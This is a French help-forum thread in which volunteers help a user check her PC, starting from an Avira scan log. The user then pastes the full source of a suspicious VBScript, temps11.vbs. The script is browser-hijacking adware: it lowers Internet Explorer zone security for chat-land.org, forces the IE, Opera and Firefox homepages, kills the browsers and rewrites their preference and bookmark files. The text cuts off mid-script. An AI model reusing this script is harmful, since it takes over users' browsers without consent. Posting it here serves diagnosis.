AEHEUR.DLL : 8.1.0.137 1823095 Bytes 29/06/2009 20:19:41
AEHELP.DLL : 8.1.3.6 205174 Bytes 29/06/2009 20:19:38
AEGEN.DLL : 8.1.1.48 348532 Bytes 02/07/2009 22:28:32
AEEMU.DLL : 8.1.0.9 393588 Bytes 09/10/2008 13:32:40
AECORE.DLL : 8.1.6.12 180599 Bytes 29/06/2009 20:19:37
AEBB.DLL : 8.1.0.3 53618 Bytes 09/10/2008 13:32:40
AVWINLL.DLL : 9.0.0.3 18177 Bytes 12/12/2008 07:47:30
AVPREF.DLL : 9.0.0.1 43777 Bytes 03/12/2008 10:39:26
AVREP.DLL : 8.0.0.3 155905 Bytes 20/01/2009 13:34:28
AVREG.DLL : 9.0.0.0 36609 Bytes 07/11/2008 14:24:42
AVARKT.DLL : 9.0.0.3 292609 Bytes 24/03/2009 14:05:22
AVEVTLOG.DLL : 9.0.0.7 167169 Bytes 30/01/2009 09:36:37
SQLITE3.DLL : 3.6.1.0 326401 Bytes 28/01/2009 14:03:49
SMTPLIB.DLL : 9.2.0.25 28417 Bytes 02/02/2009 07:20:57
NETNT.DLL : 9.0.0.0 11521 Bytes 07/11/2008 14:40:59
RCIMAGE.DLL : 9.0.0.21 2438401 Bytes 17/02/2009 12:49:32
RCTEXT.DLL : 9.0.37.0 88321 Bytes 15/04/2009 09:07:05

Configuration pour la recherche actuelle :
Nom de la tâche...............................: Contrôle intégral du système
Fichier de configuration......................: c:\program files\avira\antivir desktop\sysscan.avp
Documentation.................................: bas
Action principale.............................: interactif
Action secondaire.............................: ignorer
Recherche sur les secteurs d'amorçage maître..: marche
Recherche sur les secteurs d'amorçage.........: marche
Secteurs d'amorçage...........................: C:, F:,
Recherche dans les programmes actifs..........: marche
Recherche en cours sur l'enregistrement.......: marche
Recherche de Rootkits.........................: marche
Contrôle d'intégrité de fichiers système......: arrêt
Fichier mode de recherche.....................: Tous les fichiers
Recherche sur les archives....................: marche
Limiter la profondeur de récursivité..........: 20
Archive Smart Extensions......................: marche
Heuristique de macrovirus.....................: marche
Heuristique fichier...........................: moyen
Catégories de dangers divergentes.............: +APPL,+GAME,+JOKE,+PCK,+SPR,

Début de la recherche : samedi 4 juillet 2009 12:24

La recherche d'objets cachés commence.
'44855' objets ont été contrôlés, '0' objets cachés ont été trouvés.

La recherche sur les processus démarrés commence :
Processus de recherche 'avscan.exe' - '1' module(s) sont contrôlés
Processus de recherche 'firefox.exe' - '1' module(s) sont contrôlés
Processus de recherche 'usnsvc.exe' - '1' module(s) sont contrôlés
Processus de recherche 'msnmsgr.exe' - '1' module(s) sont contrôlés
Processus de recherche 'wscntfy.exe' - '1' module(s) sont contrôlés
Processus de recherche 'alg.exe' - '1' module(s) sont contrôlés
Processus de recherche 'lxcrcoms.exe' - '1' module(s) sont contrôlés
Processus de recherche 'svchost.exe' - '1' module(s) sont contrôlés
Processus de recherche 'jqs.exe' - '1' module(s) sont contrôlés
Processus de recherche 'avguard.exe' - '1' module(s) sont contrôlés
Processus de recherche 'soffice.bin' - '1' module(s) sont contrôlés
Processus de recherche 'soffice.exe' - '1' module(s) sont contrôlés
Processus de recherche 'TeaTimer.exe' - '1' module(s) sont contrôlés
Processus de recherche 'ctfmon.exe' - '1' module(s) sont contrôlés
Processus de recherche 'daemon.exe' - '1' module(s) sont contrôlés
Processus de recherche 'avgnt.exe' - '1' module(s) sont contrôlés
Processus de recherche 'jusched.exe' - '1' module(s) sont contrôlés
Processus de recherche 'ezprint.exe' - '1' module(s) sont contrôlés
Processus de recherche 'lxcrmon.exe' - '1' module(s) sont contrôlés
Processus de recherche 'sched.exe' - '1' module(s) sont contrôlés
Processus de recherche 'spoolsv.exe' - '1' module(s) sont contrôlés
Processus de recherche 'explorer.exe' - '1' module(s) sont contrôlés
Processus de recherche 'svchost.exe' - '1' module(s) sont contrôlés
Processus de recherche 'svchost.exe' - '1' module(s) sont contrôlés
Processus de recherche 'svchost.exe' - '1' module(s) sont contrôlés
Processus de recherche 'svchost.exe' - '1' module(s) sont contrôlés
Processus de recherche 'svchost.exe' - '1' module(s) sont contrôlés
Processus de recherche 'lsass.exe' - '1' module(s) sont contrôlés
Processus de recherche 'services.exe' - '1' module(s) sont contrôlés
Processus de recherche 'winlogon.exe' - '1' module(s) sont contrôlés
Processus de recherche 'csrss.exe' - '1' module(s) sont contrôlés
Processus de recherche 'smss.exe' - '1' module(s) sont contrôlés
'32' processus ont été contrôlés avec '32' modules

La recherche sur les secteurs d'amorçage maître commence :
Secteur d'amorçage maître HD0
[INFO] Aucun virus trouvé !

La recherche sur les secteurs d'amorçage commence :
Secteur d'amorçage 'C:\'
[INFO] Aucun virus trouvé !
Secteur d'amorçage 'F:\'
[INFO] Aucun virus trouvé !

La recherche sur les renvois aux fichiers exécutables (registre) commence :
Le registre a été contrôlé ( '44' fichiers).

La recherche sur les fichiers sélectionnés commence :

Recherche débutant dans 'C:\'
C:\pagefile.sys
[AVERTISSEMENT] Impossible d'ouvrir le fichier !
[REMARQUE] Ce fichier est un fichier système Windows.
[REMARQUE] Il est correct que ce fichier ne puisse pas être ouvert pour la recherche.
C:\Documents and Settings\CLENET\Mes documents\FileZilla_3.2.5_win32-setup.exe
[0] Type d'archive: NSIS
--> u
[AVERTISSEMENT] Aucun autre fichier n'a pu être décompressé de cette archive. L'archive est refermée.
[AVERTISSEMENT] Aucun autre fichier n'a pu être décompressé de cette archive. L'archive est refermée.
C:\Documents and Settings\CLENET\Mes documents\FileZilla_3.2.6_win32-setup.exe
[0] Type d'archive: NSIS
--> u
[AVERTISSEMENT] Aucun autre fichier n'a pu être décompressé de cette archive. L'archive est refermée.
[AVERTISSEMENT] Aucun autre fichier n'a pu être décompressé de cette archive. L'archive est refermée.
C:\Documents and Settings\Documents and Settings\CLENET\Local Settings\Temp\9093.exe
[0] Type d'archive: RAR SFX (self extracting)
--> Redist\DirectX\Apr2006_d3dx9_30_x86.cab
[1] Type d'archive: CAB (Microsoft)
--> d3dx9_30.dll
[AVERTISSEMENT] Aucun autre fichier n'a pu être décompressé de cette archive. L'archive est refermée.
[AVERTISSEMENT] Aucun autre fichier n'a pu être décompressé de cette archive. L'archive est refermée.
C:\WINDOWS\system32\drivers\sptd.sys
[AVERTISSEMENT] Impossible d'ouvrir le fichier !
Recherche débutant dans 'F:\'

Fin de la recherche : samedi 4 juillet 2009 13:20
Temps nécessaire: 55:30 Minute(s)

La recherche a été effectuée intégralement

6260 Les répertoires ont été contrôlés
327205 Des fichiers ont été contrôlés
0 Des virus ou programmes indésirables ont été trouvés
0 Des fichiers ont été classés comme suspects
0 Des fichiers ont été supprimés
0 Des virus ou programmes indésirables ont été réparés
0 Les fichiers ont été déplacés dans la quarantaine
0 Les fichiers ont été renommés
2 Impossible de contrôler des fichiers
327203 Fichiers non infectés
3564 Les archives ont été contrôlées
8 Avertissements
1 Consignes
44855 Des objets ont été contrôlés lors du Rootkitscan
0 Des objets cachés ont été trouvés

Réponse 30 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

analyse ce fichier sur virus total et colle nous le rapport

happygirly Messages postés 102 Statut Membre

Bonjour Jlpjlp,

J'ai regardé hier ou il devrait se trouver, le souci est que je ne le retrouve pas en prenant le chemin de sa destination et le dossier jaune nommé drivers et jaune plus pâle!!
Késako?

Réponse 31 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

tout est dit par Moe!

tu es allé sur un site du nom de clenet pour les annonces autos?

c:\documents and settings\CLENET\temps11.vbs

Réponse 32 / 32

moe

Re,

Bah déjà c:\windows\system32\46028.sys est clean et appartient bien à Mcafee rootkit detective.
Après l'avoir installé chez moi pour vérifier, j'ai fait une petite capture d'écran et ça confirme en parallèle le résultat de l'analyse virustotal.

Dans l'analyse sur virus total tu peux voir ceci :
bla,bla,bla...
Information additionnelle
File size: 54624 bytes
MD5...: 43b0076b3ab8996b84d2cc8f990b582f
SHA1..: 97d13f87d18e1829d9af7e54cd5a0b2d68d684e7

La capture confirme la taille et surtout le md5 et SHA1 que tu peux comparer à l'équivalent d'une empreinte digitale pour un fichier, donc pas de soucis, pour ma part le doute est levé :-)

Pour le second fichier temps11.vbs, est-ce que tu pourrais faire un clic droit dessus puis cliquer sur modifier et copier/coller le contenu ici pour voir le code qu'il contient exactement ?
(Ca ne va pas exécuter le fichier t'inquiètes, mais juste l'ouvrir dans le bloc note.)

@++

ps:
jlpjlp, tu pense à truc en particulier pour le vbs ?

happygirly Messages postés 102 Statut Membre

Voilà!!

On Error Resume Next
Set Shell = WScript.CreateObject("WScript.Shell")
Shell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\New Windows\Allow\*.chat-land.org",0, "REG_BINARY"
Shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\chat-land.org\*",2,"REG_DWORD"
Dim Shell, DesktopPath, URL, xx, fold, oFSO,oFld, doss, div
dim chemopera, qqop, ooop, mirop, plopop, ssop, chemstartop, mohstop, mirstop, fso, x
dim chemfir, fav, stRep, oFSOf, oFldf, pp, moh, mir, fsofir, xfav, chat, mohfav, mir0, mir1, mir2, mir3, ajout, fsofav, hahaha
set WshShell = WScript.CreateObject("WScript.Shell")
Set Shell = CreateObject("WScript.Shell")
Set oFSO = CreateObject("Scripting.FileSystemObject")
xx = shell.SpecialFolders("Favorites" )
doss = (xx & "\Chat-Land Privilèges")
Set oFld=oFSO.CreateFolder (doss)
div = (doss & "\Divertissements")
Set oFld=oFSO.CreateFolder (div)
DesktopPath = Shell.SpecialFolders("Desktop")
Set URL = Shell.CreateShortcut(DesktopPath & "\Chat-Land site de chat et de rencontre gratuit.URL")
URL.TargetPath = "https://tchatpassion.com/"
URL.Save
DesktopPath = shell.SpecialFolders("StartMenu")
Set URL = Shell.CreateShortcut(DesktopPath & "\Chat-Land site de chat et de rencontre gratuit.URL")
URL.TargetPath = "https://tchatpassion.com/"
URL.Save
DesktopPath = shell.SpecialFolders("Programs")
Set URL = Shell.CreateShortcut(DesktopPath & "\Chat-Land site de chat et de rencontre gratuit.URL")
URL.TargetPath = "https://tchatpassion.com/"
URL.Save
DesktopPath = shell.SpecialFolders("Favorites")
Set URL = Shell.CreateShortcut(DesktopPath & "\Chat-Land site de chat et de rencontre gratuit.URL")
URL.TargetPath = "https://tchatpassion.com/"
URL.Save
Set WshShell = WScript.CreateObject("WScript.Shell")
DesktopPath = wshshell.SpecialFolders(5) & "\Microsoft\Internet Explorer\Quick Launch"
Set URL = Shell.CreateShortcut(DesktopPath & "\Chat-Land site de chat et de rencontre gratuit.URL")
URL.TargetPath = "https://tchatpassion.com/"
URL.Save
Set oIE = CreateObject("InternetExplorer.Application")
Shell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://ww12.cherche.us"
Shell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", "http://ww12.cherche.us"
Set fold = CreateObject("Scripting.FileSystemObject")
if fold.FolderExists(doss) = "Vrai" then
Set URL = Shell.CreateShortcut(doss & "\Chat-Land site de chat et de rencontre gratuit.URL")
URL.TargetPath = "https://tchatpassion.com/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land la connaissance à la portée de tous.URL")
URL.TargetPath = "http://medecine.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Forum Partager astuces et discuter en ligne.URL")
URL.TargetPath = "http://forum2.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Top miss & mister.URL")
URL.TargetPath = "http://www.chat-land.org/vip/top.php"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Partenaires.URL")
URL.TargetPath = "http://www.chat-land.org/topliste/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Mon Album Photos.URL")
URL.TargetPath = "http://www.chat-land.org/photos/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Trouver l'Elu(e).URL")
URL.TargetPath = "http://www.chat-land.org/vip/find.php"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Mail.URL")
URL.TargetPath = "http://webmail.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Ticket gagnant Jouez et gagnez.URL")
URL.TargetPath = "http://www.chat-land.org/ticket/"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Inscription gratuite VIP.URL")
URL.TargetPath = "http://www.chat-land.org/vip/register.php"
URL.Save
Set URL = Shell.CreateShortcut(doss & "\Chat-Land Inscription premium.URL")
URL.TargetPath = "http://www.chat-land.org/vip/premium2/authentification.php"
URL.Save
end if
Set fold = CreateObject("Scripting.FileSystemObject")
if fold.FolderExists(div) = "Vrai" then
Set URL = Shell.CreateShortcut(div & "\Chat-Land Videos Droles.URL")
URL.TargetPath = "http://videos.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(div & "\Chat-Land Jeux.URL")
URL.TargetPath = "http://jeux.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(div & "\Chat-Land fonds ecrans.URL")
URL.TargetPath = "http://fonds-ecrans.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(div & "\Chat-Land blagues.URL")
URL.TargetPath = "http://blagues.chat-land.org/"
URL.Save
Set URL = Shell.CreateShortcut(div & "\Chat-Land Paroles.URL")
URL.TargetPath = "http://paroles.chat-land.org/"
URL.Save
end if
Set WshShell = WScript.CreateObject("WScript.Shell")
sfop = sfop & WshShell.SpecialFolders(5)
chemopera = sfop & "\Opera\Opera\profile\"
dim foldop
Set foldop = CreateObject("Scripting.FileSystemObject")
if foldop.FolderExists(chemopera) = "Vrai" then
Set qqop = CreateObject("Scripting.FileSystemObject")
Set Ftxt = qqop.OpenTextFile(chemopera & "opera6.adr")
Do While Not Ftxt.AtEndOfStream
plopop = Ftxt.Readline
mirop = mirop & vbcrlf & plopop
if plopop = " NAME=Chat-land" then ooop = "1"
Loop
Ftxt.Close
if ooop = "1" then
else
Const ForWriting = 2
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssop = fso.OpenTextFile(chemopera & "opera6.adr", ForWriting,true)
ssop.write mirop & vbcrlf &_
"#FOLDER" & VbCrLf &_
" ID=14" & VbCrLf &_
" NAME=Chat-Land Privileges" & VbCrLf &_
" CREATED=1227261952" & VbCrLf &_
" DESCRIPTION=Entrez le nom du nouveau dossier à créer dans 'Signets'. " & VbCrLf &_
" UNIQUEID=1A5C1390C45C5F4AB35B67F1B713B853" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=15" & VbCrLf &_
" NAME=Rencontre: Tchat Gratuit+Tchatche+Chat(NOUVEAU)! Rencontres" & VbCrLf &_
" URL=https://tchatpassion.com/" & VbCrLf &_
" CREATED=1227261937" & VbCrLf &_
" VISITED=1227262205" & VbCrLf &_
" DESCRIPTION=Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) ? Facile Rapide Gratuit Sympa sans inscription!" & VbCrLf &_
" UNIQUEID=814BDA56C4F77E44897D996031E1D39A" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=16" & VbCrLf &_
" NAME=Accueil - Encyclopedie Chat-land" & VbCrLf &_
" URL=http://medecine.chat-land.org/index.php/Accueil" & VbCrLf &_
" CREATED=1227261960" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=D70E26AB07954943AC403CDE1E6EBBC1" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=17" & VbCrLf &_
" NAME=http://www.chat-land.org/vip/premium2/authentification.php" & VbCrLf &_
" URL=http://www.chat-land.org/vip/premium2/authentification.php" & VbCrLf &_
" CREATED=1227261965" & VbCrLf &_
" ESCRIPTION=" & VbCrLf &_
" UNIQUEID=404660FE33F38C4C9792B950A506C4AC" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=18" & VbCrLf &_
" NAME=Chat-land VIP - Tes infos persos" & VbCrLf &_
" URL=http://www.chat-land.org/vip/register.php" & VbCrLf &_
" CREATED=1227261973" & VbCrLf &_
" VISITED=1227262503" & VbCrLf &_
" DESCRIPTION=Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) ?Facile Rapide Gratuit Sympa sans inscription!" & VbCrLf &_
" UNIQUEID=FD346A48F69FA34EB3F0AF59142FEF27" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=19" & VbCrLf &_
" NAME=Chat-Land - Ticket Gagnant" & VbCrLf &_
" URL=http://www.chat-land.org/ticket/" & VbCrLf &_
" CREATED=1227261979" & VbCrLf &_
" DESCRIPTION=ticket,gagnant,argent,cash,gagner des sous" & VbCrLf &_
" UNIQUEID=72D4A6563CFDBB46833F34D457FB43A1" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=20" & VbCrLf &_
" NAME=CHAT-LAND mail" & VbCrLf &_
" URL=http://webmail.chat-land.org/" & VbCrLf &_
" CREATED=1227261985" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=1272AABFCDABFB4EB99B1484BB578799" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=21" & VbCrLf &_
" NAME=Chat-Land - Recherche VIP" & VbCrLf &_
" URL=http://www.chat-land.org/vip/find.php" & VbCrLf &_
" CREATED=1227261990" & VbCrLf &_
" DESCRIPTION=Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) Facile Rapide Gratuit Sympa sans inscription!" & VbCrLf &_
" UNIQUEID=4082BA19D9F2924C8B46F1588A4F923D" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=22" & VbCrLf &_
" NAME=Chat-Land VIP - Album Photos" & VbCrLf &_
" URL=http://www.chat-land.org/photos/" & VbCrLf &_
" CREATED=1227261996" & VbCrLf &_
" VISITED=1227262499" & VbCrLf &_
" DESCRIPTION=Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) ?Facile Rapide Gratuit Sympa sans inscription!" & VbCrLf &_
" UNIQUEID=0933A57175E2B94694A61F12B294BD49" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=23" & VbCrLf &_
" NAME=Liens partenaires de tchat, chat, rencontres, dialogue et discussion directe" & VbCrLf &_
" URL=http://www.chat-land.org/topliste/" & VbCrLf &_
" CREATED=1227262008" & VbCrLf &_
" DESCRIPTION=Trouvez les meilleurs sites de tchat et de rencontres gratuit, chat-land votre partenaire de tchat" & VbCrLf &_
" UNIQUEID=A8D292EE315DE643A2A0CA4E512975CF" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=24" & VbCrLf &_
" NAME=Chat-Land - Top Miss et Mister- tchat et rencontre gratuit" & VbCrLf &_
" URL=http://www.chat-land.org/vip/top.php" & VbCrLf &_
" CREATED=1227262014" & VbCrLf &_
" DESCRIPTION=Inscription chat gratuit, tchat, rencontre et amour avec votre premier site de tchat et de rencontre gratuit " & VbCrLf &_
" UNIQUEID=E2FB0014BE2E6B4B819409B44E41C1FD" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=25" & VbCrLf &_
" NAME=Chat-Land Forums - édité par vBulletin" & VbCrLf &_
" URL=http://forum.chat-land.org/" & VbCrLf &_
" CREATED=1227262017" & VbCrLf &_
" DESCRIPTION=This is a discussion forum." & VbCrLf &_
" UNIQUEID=2FF53950CACBAF4A974A1F3FF42B770C" & VbCrLf & VbCrLf &_
"#FOLDER" & VbCrLf &_
" ID=26" & VbCrLf &_
" NAME=Divertissements" & VbCrLf &_
" CREATED=1227262235" & VbCrLf &_
" DESCRIPTION=Entrez le nom du nouveau dossier à créer dans 'Chat-land'. " & VbCrLf &_
" UNIQUEID=C3EFE598CA20BB44960FA693E89A1150" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=27" & VbCrLf &_
" NAME=Chat-Land - Paroles de Chansons" & VbCrLf &_
" URL=http://paroles.chat-land.org/" & VbCrLf &_
" CREATED=1227262225" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=CF708F11F2D4C34BAB9A5A67B43C0A95" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=28" & VbCrLf &_
" NAME=Chat-Land - Vidéos drôles" & VbCrLf &_
" URL=http://videos.chat-land.org/" & VbCrLf &_
" CREATED=1227262242" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=4BEBC14DD7276A49B3F2B3DA72F3A381" & VbCrLf &_
"#URL" & VbCrLf &_
" ID=29" & VbCrLf &_
" NAME=Chat-Land - Fond écran" & VbCrLf &_
" URL=http://fonds-ecrans.chat-land.org/" & VbCrLf &_
" CREATED=1227262246" & VbCrLf &_
" VISITED=1227262485" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=5D26E5646FBB2A4CB92C2236C26241B8" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=30" & VbCrLf &_
" NAME=Chat-Land - Jeux" & VbCrLf &_
" URL=http://jeux.chat-land.org/?session_id=4bd6d5b502b6ab23ef46930bfbdcca3b" & VbCrLf &_
" CREATED=1227262250" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=8A500AA69DFF4A46A7953E23D2019F18" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=31" & VbCrLf &_
" NAME=tchat, rencontres gratuites et sans inscription, divertissements, blagues et jeux diverses" & VbCrLf &_
" URL=http://blagues.chat-land.org/" & VbCrLf &_
" CREATED=1227262253" & VbCrLf &_
" DESCRIPTION=Rencontre, chat et divertissements avec chat-land, le 1er site mondiale de tchat et de rencontres" & VbCrLf &_
" UNIQUEID=99EA9EB4D3049C4086EC11E8F0DA7189" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=32" & VbCrLf &_
" NAME=Rurique en maintenance" & VbCrLf &_
" URL=http://www.chat-land.org/rubrique_maintenance.html" & VbCrLf &_
" CREATED=1227262258" & VbCrLf &_
" DESCRIPTION=" & VbCrLf &_
" UNIQUEID=DB4852A524C0064EBD383A259987BB4A" & VbCrLf & VbCrLf &_
"-" & VbCrLf & VbCrLf &_
"-" & VbCrLf & VbCrLf &_
"#URL" & VbCrLf &_
" ID=40" & VbCrLf &_
" NAME=Rencontre: Tchat Gratuit+Tchatche+Chat(NOUVEAU)! Rencontres" & VbCrLf &_
" URL=https://tchatpassion.com/" & VbCrLf &_
" CREATED=1227354729" & VbCrLf &_
" DESCRIPTION=Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) ? Facile Rapide Gratuit Sympa sans inscription!" & VbCrLf &_
" UNIQUEID=54A6F4D684D9464C8D5AF854FDBAFF83" & VbCrLf
ssop.close
end if
Set WshShell = WScript.CreateObject("WScript.Shell")
sfstop = sfstop & WshShell.SpecialFolders(5)
chemstartop = sfstop & "\Opera\Opera\profile\"
strNewstop = "Home URL="
Set mohstop = CreateObject("Scripting.FileSystemObject")
Set Ftxt = mohstop.OpenTextFile(chemstartop & "opera6.ini")
Do While Not Ftxt.AtEndOfStream
plop = Ftxt.Readline
if mid(plop,1,9) = strNewstop then
mirstop = mirstop & vbCrLf & plop & vbCrLf & "Home URL=http://ww12.cherche.us"
else
mirstop = mirstop & vbCrLf & plop
end if
Loop
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'opera.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
Ftxt.Close
Set fso = CreateObject("Scripting.FileSystemObject")
Set x = fso.OpenTextFile(chemstartop & "opera6.ini", ForWriting,true)
x.write mirstop
x.close
end if
Set WshShell = WScript.CreateObject("WScript.Shell")
sf = sf & WshShell.SpecialFolders(5)
chemfir = sf & "\Mozilla\Firefox\Profiles\"
Set oFSOf = CreateObject("Scripting.FileSystemObject")
stRep = chemfir
If oFSOf.FolderExists(stRep) Then
For each oFldf in oFSOf.GetFolder(stRep).SubFolders
pp = oFldf.name
Next
End If
hahaha = chemfir & pp
fav = chemfir & pp & "\bookmarks.html"
chemfir = chemfir & pp & "\prefs.js"
dim foldfir
Set foldfir = CreateObject("Scripting.FileSystemObject")
if foldfir.FolderExists(hahaha) = "Vrai" then
strNew = "user_pref(""browser.startup.homepage"""
Set moh = CreateObject("Scripting.FileSystemObject")
Set Ftxt = moh.OpenTextFile(chemfir)
Do While Not Ftxt.AtEndOfStream
plop = Ftxt.Readline
if mid(plop,1,36) = strnew then
else
mir = mir & vbCrLf & plop
end if
Loop
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'firefox.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
Ftxt.Close
chat = "user_pref(""browser.startup.homepage"", ""http://ww12.cherche.us""); "
Set fsofir = CreateObject("Scripting.FileSystemObject")
Set xf = fsofir.OpenTextFile(chemfir, ForWriting,true)
xf.write mir & vbCrLf & chat
xf.close
mir0 = 0
strNew = "<DL><p>"
Set mohfav = CreateObject("Scripting.FileSystemObject")
Set Ftxt = mohfav.OpenTextFile(fav)
Do While Not Ftxt.AtEndOfStream
plop = Ftxt.Readline
if plop = strnew then mir0 = 1
if mir0 = 0 then mir1 = mir1 & vbCrLf & plop
if mir0 = 1 then mir2 = plop: mir0 = 2
if mir0 = 2 then mir3 = mir3 & vbCrLf & plop
Loop
ajout = "<DT><H3 ADD_DATE=""1227117220"" LAST_MODIFIED=""1227117899"" ID=""rdf:#$QYUbW1"">Chat-Land Privileges</H3>" & vbCrLf &_
"<DD>Site de chat et rencontre gratuit" & vbCrLf &_
"<DL><p>" & vbCrLf &_
"<DT><A HREF=""http://forum.chat-land.org/"" ADD_DATE=""1227117345"" LAST_VISIT=""1227172822"" ICON=""data:image/x-icon;base64,AAABAAYAEBAQAAAAAAAoAQAAZgAAABAQAAABAAgAaAUAAI4BAAAgIBAAAAAAAOgCAAD2BgAAICAAAAEACACoCAAA3gkAABAQAAABACAAaAQAAIYSAAAgIAAAAQAgAKgQAADuFgAAKAAAABAAAAAgAAAAAQAEAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIAAAACAgACAAAAAgACAAICAAACAgIAAwMDAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAAh4AAAAAAAACGd3Z3d4gAAIfHd8d2dgAAd4eI+Ix1AACHh4AAd3YAAHh4gAB4eAAAeIiAAHh4AAB4iABweIgAAHiPAHCIgAAAeI8AgIiAAAB48AjwiIAAAAAAB/CPgAAAAACH8AjwAABniP/wCIAAAHiI+PAAAAAAeAAAAAAAAMf/AADAAwAAwAMAAMADAADBwwAAwcMAAMHDAADDQwAAw0cAAMNHAADGRwAA/kcAAPxnAADAZwAAwH8AAM//AAAoAAAAEAAAACAAAAABAAgAAAAAAEABAAAAAAAAAAAAAAABAAAAAQAAAAAAAF4+NQCKX00AimBOAI9qXACRY1MAkWRTAJFlVACQaFoAlmlZAJRsXACabFsAmW1cAJxvXwCbc2YAnHdrAJd8cgCee3EAn31yAJB/egChc2EAp3loAKh6aQCtfm0AkYJ9AJmEewCigngApIJ4ALSEcgC2iXYAuox6AL+QfgCViIMAnpOQAKePhwCsjYMAs4+BAK+QhQCulIwAtZWHALCUjACnl5IAo5eUAKSZlACqn5oAtZuUAL+hkAC6oJcAsKajAL+pogC+q6UAu7OwAMKSgQDHloMAzJ6MAMGkngDTo5EA1KaUANyplQDaqpgA37CeAMGmoADNsKUAybSvANi9rwDJuLEAy7u0AOK1ogDmtqQA6rimAO65pQDaw7oA38S6AOjKvADzwrAA9sazAPXHtAD1yLYA+si0APLLvAD7zLoA/tG+AOXNwgDhzcQA59fIAOfYyAD91MEA/tnFAPTfzwD/3coA6tnTAOvc0gDt39YA/uHOAO/j0wDu5N4A/eLQAPrm0gD76dYA8OTYAPjj2QD36NgA/+vYAP7w3gD58OAA9vDsAP348gD///sA/v7+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA